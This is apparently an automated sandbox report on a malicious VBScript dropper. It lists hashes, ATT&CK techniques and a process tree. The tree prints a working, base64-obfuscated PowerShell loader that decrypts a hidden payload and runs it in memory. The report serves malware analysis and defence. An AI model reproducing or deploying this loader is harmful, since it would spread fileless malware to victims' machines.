0d5673f533f07a31d3942d8430f717eee529ac7476b855edb4b3ef793eb8d283

General

Target

Damage product 3.vbs
Size

98KB
MD5

540e4bf8702b547df9e3868c10ac3af5
SHA1

e0e0ff304f3b373b285dc405f3eb44f03c2b989e
SHA256

de17c28e65d85e092109368925d9e27f51cb79c01cf4526011cfec863462e1af
SHA512

cbba98c3aa544380167e1a39d6232187c215a2432009666ad04db0d4fccba6c5f3dfc8d797b9916ab0fb4dcad149e54b899d00eb1268e99d442c34ce6e9d54a6
SSDEEP

3072:SMEJk61R5X/jMrkaQlPYvEIX3eUfiRwle2TfjH:p8/RaQ9wrXuUfi2TfjH

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2804	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2804	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2804	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2804	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 2736 wrote to memory of 2828	2736	WScript.exe	30
PID 2736 wrote to memory of 2828	2736	WScript.exe	30
PID 2736 wrote to memory of 2828	2736	WScript.exe	30
PID 2828 wrote to memory of 2980	2828	cmd.exe	32
PID 2828 wrote to memory of 2980	2828	cmd.exe	32
PID 2828 wrote to memory of 2980	2828	cmd.exe	32
PID 2980 wrote to memory of 2804	2980	cmd.exe	34
PID 2980 wrote to memory of 2804	2980	cmd.exe	34
PID 2980 wrote to memory of 2804	2980	cmd.exe	34
PID 2980 wrote to memory of 2804	2980	cmd.exe	34

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Damage product 3.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2736
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\zlsfPZ.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\zlsfPZ.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2980
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskc2ducXIgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHNnbnFyKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRzZ25xciIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRzZ25xciwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkc2ducXIiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gZHViY3MoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ1JUa3FDdWhheVpHZDIrVGhkS21nUUNiV3k1T2QvbHUvL0dYNm1SVmdIcVk9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ2FYSDJzOWdqVDJMUHc3dm1NeGFGL0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gdHVjc3YoJHBhcmFtX3Zhcil7CSRkdmxncj1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkZmN4aHA9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkdnJ0b209TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgkZHZsZ3IsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJHZydG9tLkNvcHlUbygkZmN4aHApOwkkdnJ0b20uRGlzcG9zZSgpOwkkZHZsZ3IuRGlzcG9zZSgpOwkkZmN4aHAuRGlzcG9zZSgpOwkkZmN4aHAuVG9BcnJheSgpO31mdW5jdGlvbiBzdmF3aCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHhyY2htPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGJjdndnPSR4cmNobS5FbnRyeVBvaW50OwkkYmN2d2cuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHNnbnFyOyRpYndycD1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHNnbnFyKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkdGRlIGluICRpYndycCkgewlpZiAoJHRkZS5TdGFydHNXaXRoKCc6OiAnKSkJewkJJHdlbmh1PSR0ZGUuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JHJ2dXRoPVtzdHJpbmdbXV0kd2VuaHUuU3BsaXQoJ1wnKTskanpuY3A9dHVjc3YgKGR1YmNzIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHJ2dXRoWzBdKSkpOyRiamRxdz10dWNzdiAoZHViY3MgKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcnZ1dGhbMV0pKSk7c3Zhd2ggJGp6bmNwICRudWxsO3N2YXdoICRiamRxdyAoLFtzdHJpbmdbXV0gKCclKicpKTs=')) | Invoke-Expression"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2804

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\zlsfPZ.bat

Filesize
88KB

MD5
256444260f4883588278d45371a49e19

SHA1
9037eecde41b28d23f45127b6cb59c40bf2e5124

SHA256
4c2c6abf901520384cdb3b5c9074055fe49c9bd67df2da7a797745927f13a92a

SHA512
9b0214afe7c9f76041210f2a39e1cdd58d4bdad4f8c59f091ad56343416adc06ad13870c1e03cb40cc71651353ab3776376bd7bc41bf1e8ac5e096afab053789

Download Submit
memory/2804-13-0x0000000073EA1000-0x0000000073EA2000-memory.dmp

Filesize
4KB

Download
memory/2804-14-0x0000000073EA0000-0x000000007444B000-memory.dmp

Filesize
5.7MB

Download
memory/2804-15-0x0000000073EA0000-0x000000007444B000-memory.dmp

Filesize
5.7MB

Download
memory/2804-16-0x0000000073EA0000-0x000000007444B000-memory.dmp

Filesize
5.7MB

Download
memory/2804-17-0x0000000073EA0000-0x000000007444B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing